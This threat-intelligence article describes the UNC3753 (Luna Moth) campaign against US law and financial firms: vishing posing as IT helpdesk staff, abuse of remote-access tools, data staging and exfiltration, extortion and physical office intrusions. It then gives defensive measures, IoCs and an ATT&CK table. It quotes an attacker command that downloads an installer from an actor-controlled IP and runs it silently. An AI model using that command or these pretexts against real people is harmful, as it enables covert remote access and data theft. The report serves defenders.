UNC3753 Targets US Law Firms with Vishing & Physical Intrusions
- [01] Immediate impact: UNC3753 targets US law, professional, and financial firms with rapid data theft and extortion.
- [02] Affected systems: Any endpoint or VDI accessible to employees, including BYOD, is vulnerable.
- [03] Remediation: Implement robust out-of-band identity verification for all remote and physical access.
Overview: UNC3753’s Evolving Data Theft and Extortion Campaign
From January through May 2026, the threat cluster UNC3753, also tracked as “Luna Moth,” “Chatty Spider,” and “Silent Ransom Group,” executed a sophisticated, financially motivated data theft and extortion campaign targeting dozens of organizations across the professional, legal, and financial services sectors in the United States. This campaign demonstrates a rapid operational tempo, with many incidents progressing from initial contact to data theft and extortion within a single business day. Notably, the group has escalated its tactics to include physical office intrusions, as detailed by Google Cloud Blog.
UNC3753 primarily leverages voice phishing (vishing) and social engineering techniques to gain unauthorized remote access. Under the guise of IT support or data migration projects, actors manipulate targets into screen-sharing sessions and installing legitimate Remote Monitoring and Management (RMM) utilities. Once inside, they either directly exfiltrate sensitive data, such as proprietary legal agreements, Personally Identifiable Information (PII), and financial records, or coerce victims into doing so, culminating in aggressive extortion demands.
Threat Actor Profile: UNC3753 (Luna Moth)
UNC3753 is a financially motivated threat cluster active since at least March 2022. While previously observed deploying Ransomware like LOCKBIT.BLACK in 2022, the group has shifted its focus to data theft and extortion-only operations, often threatening to publish stolen data on the LEAKEDDATA data leak site (DLS). The group has TTP overlaps with UNC2686, known for “Bazarcall” style campaigns. Initially, UNC3753 relied on subscription-themed email lures, but around March 2025, they transitioned to impersonating internal corporate IT helpdesk staff, signaling an adaptation to bypass traditional security controls more effectively.
UNC3753 Attack Lifecycle and TTPs
The campaign’s effectiveness stems from its optimized, fast-tempo operational model, often completing the attack sequence in less than 24 hours. Google Threat Intelligence Group (GTIG) has observed data searches, staging, and theft initiated in under an hour during recent incidents.
Initial Access: Vishing and Social Engineering
UNC3753 initiates campaigns with benign, invoice-themed email lures, devoid of malicious links or attachments. These emails serve as a pretext to increase target susceptibility to follow-up voice calls. The core of their entry relies on targeted vishing, contacting personnel across all seniority levels, often found via publicly listed organizational websites. Actors impersonate internal IT helpdesk or security teams, guiding targets to join screen-sharing sessions under false pretenses like security issues or corporate data migration projects.
Remote Access and Legitimate Tool Abuse
Threat actors bypass automated boundary security by instructing users to download and execute legitimate screen-sharing applications and RMM agents. Common tools observed include Zoom, Microsoft Terminal Services, Microsoft Teams, Quick Assist, AnyDesk, Bomgar, and Zoho Assist. In one incident, actors attempted to install a “SuperOps RMM agent” via a cURL command: curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet. Actors frequently use privnote[.]com to deliver installation links and commands, ensuring no permanent digital footprint.
Infrastructure Pivoting and Data Staging
Intrusions often exploit Bring Your Own Device (BYOD) remote environments to access internal enterprise assets. UNC3753 has established Zoom sessions on personal BYOD endpoints, then used these to access corporate Virtual Desktop Infrastructure (VDI) via native clients like Windows 365 or Citrix. Once VDI access is secured, they pivot to corporate file systems, performing:
- System Enumeration: Mapping local directories, OneDrive folders, and network drives.
- Document Management Targeted Harvesting: Focusing on legal and document storage repositories like iManage.
- Keyword Search and File Staging: Using keywords (e.g., tax logs, W-2, W-9, 1099, audit files, client agreements, SSNs) to locate highly sensitive data, which is then compiled in user-accessible subdirectories, typically the Downloads folder or Roaming profile path.
Data Exfiltration Techniques
To exfiltrate staged data and bypass security controls, UNC3753 employs various methods:
- Cloud Storage Staging: Direct manipulation of victims’ screens or instructions for victims to drag-and-drop folders into actor-controlled consumer file-sharing accounts, sometimes branded to mimic the victim organization.
- FTP Utilities: When browser-based uploads are restricted, actors download FTP/SFTP clients like WinSCP or Rclone. For instance, 1.7 GB was exfiltrated from OneDrive to Google Drive, followed by 14.4 GB via WinSCP from a VDI session.
- Email Forwarding: Victims are instructed to stage files from internal repositories (e.g., iManage) and send them to actor-controlled consumer email addresses from their corporate mailboxes.
Extortion Tactics
Extortion communications are delivered unbranded via email shortly after data theft, often within 30 minutes. These aggressive letters impose a three-day deadline for negotiations, threatening to contact employees, external clients, and publish data on the LEAKEDDATA DLS (e.g., hxxps[:]//business-data-leaks[.]com). The actors emphasize potential regulatory fines, reputational damage, and client lawsuits to pressure victims.
Physical Office Intrusions by Silent Ransom Group
In a significant escalation, GTIG assesses that actors possibly linked to UNC3753 have attempted direct data theft via physical, in-person access. An FBI Cyber FLASH Alert (260526.pdf) corroborates this, detailing instances where individuals posing as IT technicians entered corporate offices to exfiltrate data directly from endpoints using USB storage media. This tactic is deployed if remote social engineering fails, demonstrating the group’s adaptability and willingness to leverage non-digital vectors to bypass robust technical perimeters.
Defensive Strategies: Mitigating UNC3753 Data Theft
Organisations must adopt a comprehensive security posture to counter UNC3753’s blend of social engineering, legitimate tool abuse, and physical intrusions. Defending against such multifaceted attacks requires a combination of technical controls, strong policies, and continuous user awareness.
User Education
Conduct regular and targeted user awareness training specifically tailored to UNC3753’s TTPs. Emphasize the risks of vishing, the impersonation of IT staff, and the dangers of installing unauthorized software or sharing screens. Educate employees on proper verification procedures for any unexpected requests.
Physical Access and Verification Policies
Implement rigid out-of-band identity verification for all external contractors, technical staff, and facilities visitors. Mandate the following:
- Require official credentials and photo identification for all visitors.
- Front-desk staff must copy and log all physical visitor IDs.
- Verify the arrival of technicians against pre-scheduled work orders directly with the parent organization or helpdesk dispatcher.
- Enforce a policy requiring physical technical service personnel to be escorted by a corporate supervisor at all times.
Remote Access Conditional Access Controls
Implement conditional access policies for remote access, ensuring only corporate-owned devices can authenticate to VDI or VPN. This provides increased organizational control and visibility, especially for BYOD systems utilizing VDI entry. Employing Zero Trust principles can strengthen these controls.
Enforce Strict RMM and Screen-Sharing Software Controls
Audit corporate environments to block the installation and execution of unauthorized remote monitoring, management, and support utilities. Enforce application control policies (e.g., Windows Defender Application Control or third-party EDR tools) to restrict the execution of non-approved binaries. Consider restricting interactive screen-control features within authorized virtual meeting platforms like Zoom and Microsoft Teams.
Endpoint Removable Media Hardening
To neutralize physical exfiltration vectors, disable read/write capabilities for all external USB mass storage devices. Enforce Group Policy Objects (GPOs) or Mobile Device Management (MDM) configurations to restrict:
- USB storage device installation.
- Removable media access.
- Optical media writes on all corporate endpoints and BYOD systems utilizing VDI entry.
Network Monitoring and Egress Control
Monitor firewall logs, network flows, and endpoint execution logs for indicative exfiltration and staging actions. Specifically:
- Block or alert on outbound connections to unauthorized file-sharing APIs and email services.
- Ensure full session logging with bytes transferred is enabled within Firewall log configurations.
- Monitor SSH traffic (Port 22) from internal VDIs and endpoints for high-volume WinSCP and Rclone transfers. This helps in detecting WinSCP Rclone transfers which are common for data exfiltration.
Application Log and Access Auditing
Review authentication and access metrics for critical document stores to identify bulk harvesting profiles. Configure real-time alerts in iManage, SharePoint, and corporate email directories for rapid file searches, search-term spikes, and mass file downloads. Implement multi-factor authentication (MFA) on business-critical data repository applications, such as iManage, and require MFA step-up queries when accessing VDI nodes.
Outlook and Implications
The targeting of US legal and professional services organizations by financially motivated actors like UNC3753 remains a persistent and high-risk threat. These firms are high-value targets due to their concentrated repositories of highly sensitive client data, including transaction files, merger plans, trade secrets, and regulatory reports. Threat groups exploit the significant reputational and regulatory exposure of legal entities, leveraging it to motivate quiet and rapid resolution of extortion demands.
UNC3753’s reliance on voice-guided social engineering to bypass robust technical perimeters, web security gateways, and even MFA configurations underscores the enduring challenge posed by attacks targeting the human element. The integration of in-person, physical office intrusions by Silent Ransom Group represents a significant escalation in threat capability. While log-based defenses and endpoint telemetry have matured, physical corporate boundaries are frequently protected only by administrative procedures. Organizations must transition to a unified security posture that treats physical facility access control and endpoint-based hardware policies as equally critical components of their defensive perimeter. This unified approach is key to mitigating UNC3753 data theft and protecting sensitive assets.
Indicators of Compromise (IoCs)
GTIG has identified the following IoCs associated with UNC3753 activity. A comprehensive collection is available in a GTI Collection for registered users.
Data Leak Site (DLS)
hxxps[:]//business-data-leaks[.]com
Phishing Domains
<organization>-itdesk[.]com<organization>-it[.]com<organization>-helpdesk[.]com
IPv4 Addresses
192.236.147.131192.236.147.138193.141.60.212192.236.154.158192.236.146.173174.169.162.6264.94.84.97
MITRE ATT&CK Mapping
The MITRE ATT&CK framework provides a common language for describing UNC3753’s TTPs:
| Tactic | Technique ID | Technique Name |
|---|---|---|
| Initial Access | T1566.004 | Phishing: Spearphishing Voice |
| T1133 | External Remote Services | |
| Execution | T1204.002 | User Execution: Malicious File |
| T1059.001 | Command and Scripting Interpreter: PowerShell | |
| T1059.003 | Command and Scripting Interpreter: Windows Command Shell | |
| T1569.002 | System Services: Service Execution | |
| Persistence | T1053.005 | Scheduled Task/Job: Scheduled Task |
| T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys | |
| Defense Evasion | T1036.005 | Masquerading: Match Legitimate Name or Location |
| T1553.002 | Subvert Trust Controls: Code Signing | |
| T1562.001 | Impair Defenses: Disable or Modify Tools | |
| T1070.001 | Indicator Removal: Clear Windows Event Logs | |
| Credential Access | T1003.001 | OS Credential Dumping: LSASS Memory |
| T1003.002 | OS Credential Dumping: Security Account Manager | |
| Discovery | T1083 | File and Directory Discovery |
| T1135 | Network Share Discovery | |
| T1046 | Network Service Discovery | |
| Lateral Movement | T1219 | Remote Access Software |
| T1021.001 | Remote Services: Remote Desktop Protocol | |
| T1021.004 | Remote Services: SSH | |
| Collection | T1005 | Data from Local System |
| Command & Control | T1572 | Protocol Tunneling |
| Exfiltration | T1020 | Automated Exfiltration |
| T1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage | |
| T1052.001 | Exfiltration Over Physical Medium | |
| Impact | T1486 | Data Encrypted for Impact |
Advertisement